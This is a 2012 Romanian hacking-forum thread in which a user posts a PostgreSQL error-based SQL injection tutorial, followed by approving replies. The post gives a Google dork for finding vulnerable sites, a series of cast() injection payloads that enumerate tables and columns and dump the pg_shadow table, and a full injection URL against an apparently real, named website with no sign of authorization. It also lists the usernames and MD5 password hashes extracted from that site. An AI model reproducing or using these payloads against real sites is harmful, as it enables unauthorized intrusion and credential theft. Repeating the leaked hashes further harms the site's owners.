Sheyken Posted August 4, 2012 Report Share Posted August 4, 2012 (edited) As dori sa imi incep activitatea pe RST cu un topic care va aduce "benifici" comunitati, sau userilor din aceasta comunitate.Probabil, majoritatea stiti cele mai usoare metode de SQL Injection [ principalele ]:MySQL Injection Union Based sau Blind etc.M-am gandit sa fac un tutorial pentru cei care "ar vrea" sa avanseze in injecti, si acela este: Un tutorial despre PostGreSQL Injection.---------------------------Ca de obicei luam un site, m-am grabit si am luat un site [ cu ajutorul lui gooogle, prin dorku' -> inurl:.php? intext:Warning: pg_query() [function.pg-query]: Query failed: ERROR: invalid input syntax for integer: ]Ok, sa incepem partea "practica":[1] Daca ar fi sa o luam de la 0, am cauta versiunea bazei de date, pentru a afla versiunea este necesar urmatorul query:and 1=cast(version() as int)--In cazul meu:[2] Continuarea se face prin aflarea tabelelor din baza de date, pentru a afla primul tabel este necesar urmatorul query:and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)--In cazul meu:Primul tabel din baza de date, este pg_type. Pentru a trece la urmatorul tabel este necesar urmatorul query:and 1=cast((select table_name from information_schema.tables where table_name not in ('TABEL') limit 1 offset 0) as int)--In cazul meu:and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type') limit 1 offset 0) as int)--Urmatorul tabel este: pg_attributeVom continua injectia, eu am facut-o mai pe scurt si m-am dus la tabelul care ma intereseaza [ cel cu useri ].Query intreg:http://www.aspem.org/indexa.php?p=290&p1=-80' and 1=cast((select table_name from information_schema.tables where table_name not in ('pg_type','pg_attribute','user_mapping_options','user_mappings','tables','triggered_update_columns','triggers','usage_privileges','view_column_usage','view_routine_usage','view_table_usage','views','data_type_privileges','element_types','_pg_foreign_data_wrappers','foreign_data_wrapper_options','foreign_data_wrappers','pg_statistic','_pg_foreign_servers','foreign_server_options','foreign_servers','_pg_user_mappings','schemata','sequences','sql_features','sql_implementation_info','sql_languages','sql_packages','pg_database','pg_authid','pg_roles') limit 1 offset 0) as int)--+Tabelul cu Useri este pg_shadow.[3] Continuam cu extragerea coloanelor din tabelul pg_shadow, este necesar urmatorul query:and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 0) as int)--In cazul meu:Prima coloana: usenamePentru a extrage urmatoarea coloana este necesara urmatoarea modificare in Queryu' de deasupra.and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 1) as int)--A 2 a coloana: usesysidSarim... direct la coloana care ne intereseaza, coloana "passwd".and 1=cast((select column_name from information_schema.columns where table_name = pg_shadow limit 1 offset 5) as int)--Avem coloanele care ne intereseaza:usename & passwd.[4] Sa continuam, va trebui sa extragem din Usename & passwd. Data.Este necesar urmatorul Query:and 1=cast((select usename from pg_shadow limit 1 offset 0) as int)--Primul User: Al 2 lea user: postgresAl 3 lea user: salvataggiPrima Parola pentru useru' aspem:Aveti nevoie de urmatorul Query:and 1=cast((select passwd from pg_shadow limit 1 offset 0) as int)--Voi sari peste partea cu restul pozelor [ pentru ca va descurcati singuri, "sunteti baieti mari" ]Total useri & parole:User: aspemPassword: 4e8991501921aa20346da7d0ea86fe35 [MD5]User: postgresPassword: 142484a40d02122af06bc427d4367d73 [MD5]User: salvataggiPassword: No password.----------------------------Va multumesc ca "vati pierdut" timpul cu acest tutorial pe care poate [deja il stiati]. Edited August 4, 2012 by Sheyken 1 Quote Link to comment Share on other sites More sharing options...
Guest Kovalski Posted August 4, 2012 Report Share Posted August 4, 2012 Felicitari, frumos tutorial si bine explicat.Bine ai venit pe RST Quote Link to comment Share on other sites More sharing options...
Sheyken Posted August 5, 2012 Author Report Share Posted August 5, 2012 Ma bucur ca ti-a placut. O sa mai incerc sa fac cand am timp liber, mai multe tutoriale. Quote Link to comment Share on other sites More sharing options...
daNNy.bv Posted August 15, 2012 Report Share Posted August 15, 2012 frumos .. Ai putea sa pui un pack cu tutoriale de sqli? Chiar imi doresc sa invat manual... m-am saturat de morcovas Quote Link to comment Share on other sites More sharing options...
LegioNRST Posted August 15, 2012 Report Share Posted August 15, 2012 Mersi aveam nevoie c? nu ?tiu manual Quote Link to comment Share on other sites More sharing options...
Sheyken Posted August 15, 2012 Author Report Share Posted August 15, 2012 Posibil sa fac urmatorul un tutorial MsSQL Injection, daca voi avea timp liber il voi face. Quote Link to comment Share on other sites More sharing options...
2time Posted August 17, 2012 Report Share Posted August 17, 2012 Foarte folositor tot asa Quote Link to comment Share on other sites More sharing options...
Radu04 Posted August 27, 2012 Report Share Posted August 27, 2012 Wooaa! In sfarsit un tutorial bine explicat. De acum promit ca nu mai folosesc "morcovul". Quote Link to comment Share on other sites More sharing options...
.Slacker Posted August 27, 2012 Report Share Posted August 27, 2012 Folositor. Quote Link to comment Share on other sites More sharing options...
thawwatty Posted July 1, 2015 Report Share Posted July 1, 2015 Grate tutorial bro something iz new for me. Thz for sharing Quote Link to comment Share on other sites More sharing options...